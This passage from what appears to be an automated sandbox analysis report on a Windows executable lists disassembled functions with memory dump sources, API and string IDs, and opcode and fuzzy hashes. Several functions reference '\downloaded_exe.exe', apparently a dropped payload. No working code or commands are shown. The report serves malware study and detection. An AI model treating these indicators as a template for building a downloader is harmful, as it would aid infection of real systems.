                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: setlocale
                                                        • String ID: $%.*Lf
                                                        • API String ID: 1598674530-1256709865
                                                        • Opcode ID: 672b3f5145807887c88a14cb7df14884816e0d3ee6ab278b1209dd5336c75f28
                                                        • Instruction ID: 7cccd9e079e97ba1f4d7e8d1d4433c3910df7f88cc96aa43bbcaf3ca8be5283f
                                                        • Opcode Fuzzy Hash: 672b3f5145807887c88a14cb7df14884816e0d3ee6ab278b1209dd5336c75f28
                                                        • Instruction Fuzzy Hash: C6D16C27B08B89A5EA14AB2AD84437DAB61BF44F88F844171DF0D177A5CFB8E891C354
                                                        Function 00007FF702047BF0 Relevance: 12.1, APIs: 3, Strings: 4, Instructions: 1603COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: m$std::bad_exception$uninitialized __any_string$uninitialized __any_string
                                                        • API String ID: 0-4007098236
                                                        • Opcode ID: 67a1806fbc17c073c4cc9c404fa51a7bddd1502f923afc7e6ad7c53877f5b707
                                                        • Instruction ID: f4faa506c787c7c54338a1eabbd98cbeda0c26e1664a8251b355f23c057d54cc
                                                        • Opcode Fuzzy Hash: 67a1806fbc17c073c4cc9c404fa51a7bddd1502f923afc7e6ad7c53877f5b707
                                                        • Instruction Fuzzy Hash: 0FE23837608BC595D6609F26F8407AABBA4FB89B90F848126EECC43B58DF7CD055CB14
                                                        Function 00007FF70203E5B0 Relevance: 10.6, APIs: 7, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: freembstowcs$DebuggerExceptionPresentRaisemalloc
                                                        • String ID:
                                                        • API String ID: 3725749409-0
                                                        • Opcode ID: 1a7d4955ef6c90379881ab0d692c1bb618731634f38d3be85fc0aa5702ffc3a2
                                                        • Instruction ID: 5e16ca08a258130c9a5161662103b36e225f0e060ea1f1a4f2e817360425ce89
                                                        • Opcode Fuzzy Hash: 1a7d4955ef6c90379881ab0d692c1bb618731634f38d3be85fc0aa5702ffc3a2
                                                        • Instruction Fuzzy Hash: A0418123A0C74681FA60BB16EA443BAAA98AF44794F844335EF5D477D1DFBCE440C624
                                                        Function 00007FF702035700 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1475COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $ $Infinity$NaN
                                                        • API String ID: 0-3274152445
                                                        • Opcode ID: 812d5c03ee371aef61f58dd97227eae9b94d58f479252b6eee022266ebc50f54
                                                        • Instruction ID: 4cb35325aadc11abbdaf40ad6d12a45460bf6e7880f1723895cedca5aaabe3fa
                                                        • Opcode Fuzzy Hash: 812d5c03ee371aef61f58dd97227eae9b94d58f479252b6eee022266ebc50f54
                                                        • Instruction Fuzzy Hash: C0D2B433A1C7818BE7519F25A94072AFBA9FF84790F808135EA4947B59DBBDE440CF14
                                                        Function 00007FF7020A1760 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::erase
                                                        • API String ID: 0-2652434754
                                                        • Opcode ID: 6581f26d010698dcd426256f39f4a840246ad2b7a71ed03f2aeaa0ac2c0496bd
                                                        • Instruction ID: 553e8fd0dad35c922732523a995654eddc72ba5a957df3d6d860edb42d83bdb6
                                                        • Opcode Fuzzy Hash: 6581f26d010698dcd426256f39f4a840246ad2b7a71ed03f2aeaa0ac2c0496bd
                                                        • Instruction Fuzzy Hash: 3671CD77B09B4684DA91AF29D9442BDEBA0BF14BD4FD88132DE0D533A0EF68D441C368
                                                        Function 00007FF702068250 Relevance: 5.4, Strings: 4, Instructions: 400COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append$basic_string::erase
                                                        • API String ID: 0-3660802673
                                                        • Opcode ID: 3507e634911afd7d7f67673c743a8479542803ba3f540cb6d0f8130b1be3d5a6
                                                        • Instruction ID: 282639294023222f9a48917eb35eaf2aa7c2b602644a6b0e9ec03e383ffb3eef
                                                        • Opcode Fuzzy Hash: 3507e634911afd7d7f67673c743a8479542803ba3f540cb6d0f8130b1be3d5a6
                                                        • Instruction Fuzzy Hash: BE123D73608B8285DB60EF15E8443AABBA1FF84B94F808135DA8D47B99DFBCD444C758
                                                        Function 00007FF702068CF0 Relevance: 5.4, Strings: 4, Instructions: 400COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append$basic_string::erase
                                                        • API String ID: 0-3660802673
                                                        • Opcode ID: d06663a0fbb2c3d198112da6bbe079d61a22ef501384f8dd9621e5e9ddb6991f
                                                        • Instruction ID: 1f70be59d3b2213d17241466029662b485fd50519318ee9774aab592bb4ac5ba
                                                        • Opcode Fuzzy Hash: d06663a0fbb2c3d198112da6bbe079d61a22ef501384f8dd9621e5e9ddb6991f
                                                        • Instruction Fuzzy Hash: 72125D63608B8685DB60EF55E8443AABBA1FF84B84F808135EA8D07B99DF7CD444C758
                                                        Function 00007FF702055360 Relevance: 4.8, APIs: 2, Instructions: 2318stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlen
                                                        • String ID:
                                                        • API String ID: 39653677-0
                                                        • Opcode ID: 40c661bb362fe57ba8bd76495e9a9cfd1210ded621150bd7d4a98b6416efc73f
                                                        • Instruction ID: ff289649e2aee6de831456296a1ca57de8d216b40c7fce7ab37f3ff46a43c3f5
                                                        • Opcode Fuzzy Hash: 40c661bb362fe57ba8bd76495e9a9cfd1210ded621150bd7d4a98b6416efc73f
                                                        • Instruction Fuzzy Hash: 4B23A137A08BA585EB609B25E8442AFBBA1FB85B90F844235DF9D03BA4DF7CD450C714
                                                        Function 00007FF7020D5B90 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 133stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlen
                                                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
                                                        • API String ID: 39653677-4063909124
                                                        • Opcode ID: 04a13b8a1890db4a61cab29a015c06485d34cfd82fd371bfe364dc57eb62ee86
                                                        • Instruction ID: b79092ccb5d6dce664631d85b90348fc352e0a00f43cb703cb3ff064bfe373c4
                                                        • Opcode Fuzzy Hash: 04a13b8a1890db4a61cab29a015c06485d34cfd82fd371bfe364dc57eb62ee86
                                                        • Instruction Fuzzy Hash: 0A31BD93F1A78984ED00AB6ADC410A8DA509F29BB4BD45732D93C133D1DFADD5C2C318
                                                        Function 00007FF702040E80 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentTerminatememcpy
                                                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$0123456789
                                                        • API String ID: 1371612482-1546912705
                                                        • Opcode ID: 5408a2142e4f378db1dec7fd04f4216299af73eefb6c742eb31018cca1cf1667
                                                        • Instruction ID: 07c3482e29e79487de41d91a42629d091420c5666d63c8f4dfaa36f6a48314d8
                                                        • Opcode Fuzzy Hash: 5408a2142e4f378db1dec7fd04f4216299af73eefb6c742eb31018cca1cf1667
                                                        • Instruction Fuzzy Hash: 44210653F14A9494EA15AB6AEC006F9BF60EB09FD4F888271EF0C13B84DBB8D546C314
                                                        Function 00007FF70205C390 Relevance: 4.5, APIs: 2, Instructions: 1963COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: wcslen
                                                        • String ID:
                                                        • API String ID: 4088430540-0
                                                        • Opcode ID: 040535724ab8400674369eb4e0ef1078178925ff85a381b14c8cf008cba67ffc
                                                        • Instruction ID: a465ddff48d9f3e8b991aa42aec5e60efab8c6abee4bb1dbc092ae70385776d9
                                                        • Opcode Fuzzy Hash: 040535724ab8400674369eb4e0ef1078178925ff85a381b14c8cf008cba67ffc
                                                        • Instruction Fuzzy Hash: 0A135137608B9685EB609F25E8442AFBBA1FF85B84F944522DE8D03BA8DF7CD441C714
                                                        Function 00007FF702067920 Relevance: 4.2, Strings: 3, Instructions: 408COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: memcpy$memset
                                                        • String ID: $%.*Lf$basic_string::append
                                                        • API String ID: 438689982-2012992446
                                                        • Opcode ID: 940f5dff808d5b1a4cee823c3935566b0fb21ac6310e0d0759883fe07e1d7297
                                                        • Instruction ID: 5e724c46a2b89921513fb809abe39e13990139c4423b40c3a23deb4b788e65e8
                                                        • Opcode Fuzzy Hash: 940f5dff808d5b1a4cee823c3935566b0fb21ac6310e0d0759883fe07e1d7297
                                                        • Instruction Fuzzy Hash: BFF15E27B08B9585EB60AF65E8442AEBB60FB48B94F804136EE8C17B59CF7CD445C718
                                                        Function 00007FF7020661B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 605COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %.*Lf
                                                        • API String ID: 0-1110018102
                                                        • Opcode ID: 3215fa236bb668c1474626794f93a15b60a78fed9cb6520a3c8ad8b4fea3fe62
                                                        • Instruction ID: 4e6f72bd614bbb33c700427a83e85a7253cf1a272ad80ee20c0fbd152a242bf0
                                                        • Opcode Fuzzy Hash: 3215fa236bb668c1474626794f93a15b60a78fed9cb6520a3c8ad8b4fea3fe62
                                                        • Instruction Fuzzy Hash: 64325D37608B8585D7609F65F8402AEBBB4FB89B94F844126EE8C13B59CF7CD055CB14
                                                        Function 00007FF70206A220 Relevance: 3.2, APIs: 2, Instructions: 250COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: ___lc_codepage_func___mb_cur_max_func
                                                        • String ID:
                                                        • API String ID: 1180276535-0
                                                        • Opcode ID: fd220f45177c9e5e40599b8d7c2f783e39cdef69963c9f11a2217daa8061b57c
                                                        • Instruction ID: 531c9682a0432408bc4c6b1f9e15ae8826c743dae3636e6c766e2f5a6eccbb9d
                                                        • Opcode Fuzzy Hash: fd220f45177c9e5e40599b8d7c2f783e39cdef69963c9f11a2217daa8061b57c
                                                        • Instruction Fuzzy Hash: A281E223B0875546DA20BF15AC0826AEBA0AF95BE4F944631EE6C137C4DFBCE581C71C
                                                        Function 00007FF70204D660 Relevance: 2.9, Strings: 2, Instructions: 432COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \downloaded_exe.exe$cannot create shim for unknown locale::facet
                                                        • API String ID: 0-284615338
                                                        • Opcode ID: 482a89fdfa0fe9f1455a72f72a73149483c617fc7c64f6127be5ae39edee7bc1
                                                        • Instruction ID: 9b718bb39fe1c8b89190e7c0f8e3e2ae1fca6c9d927f81399586f2124a4d1906
                                                        • Opcode Fuzzy Hash: 482a89fdfa0fe9f1455a72f72a73149483c617fc7c64f6127be5ae39edee7bc1
                                                        • Instruction Fuzzy Hash: 41324D73A09B4696E760AF15E89432ABBA0FF04744F848139C78D07B95DFBCE465C3A4
                                                        Function 00007FF70204CD10 Relevance: 2.9, Strings: 2, Instructions: 432COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \downloaded_exe.exe$cannot create shim for unknown locale::facet
                                                        • API String ID: 0-284615338
                                                        • Opcode ID: 5b549b5352cb47af1cd489a714f127dcdfff664715798987e7555eeecccbeaf7
                                                        • Instruction ID: 423627e2a248b93ad124a3401ca703ca26004f91fc116f4ff423bf1515fd0ba1
                                                        • Opcode Fuzzy Hash: 5b549b5352cb47af1cd489a714f127dcdfff664715798987e7555eeecccbeaf7
                                                        • Instruction Fuzzy Hash: 17325B73A09B4696E764AF15E89432ABBA0FF04748F808135C78D07B91DFBCE465C3A4
                                                        Function 00007FF7020E15D0 Relevance: 2.6, Strings: 2, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \downloaded_exe.exe$basic_ios::clear
                                                        • API String ID: 0-3154185780
                                                        • Opcode ID: 70257406571c519e03a754c752fa5db5b90dcb9af07512684f1f418e173f03ad
                                                        • Instruction ID: ff03850cc8f095ea29fe11e2342a965010ed4782011b3642dfca9a16642f62f8
                                                        • Opcode Fuzzy Hash: 70257406571c519e03a754c752fa5db5b90dcb9af07512684f1f418e173f03ad
                                                        • Instruction Fuzzy Hash: 73318E63B0974995ED14BB16AC452AE9A51AF49FC8F8C8031ED0E0B756CF7CE482C728
                                                        Function 00007FF70205B180 Relevance: 2.3, APIs: 1, Instructions: 1097COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: wcslen
                                                        • String ID:
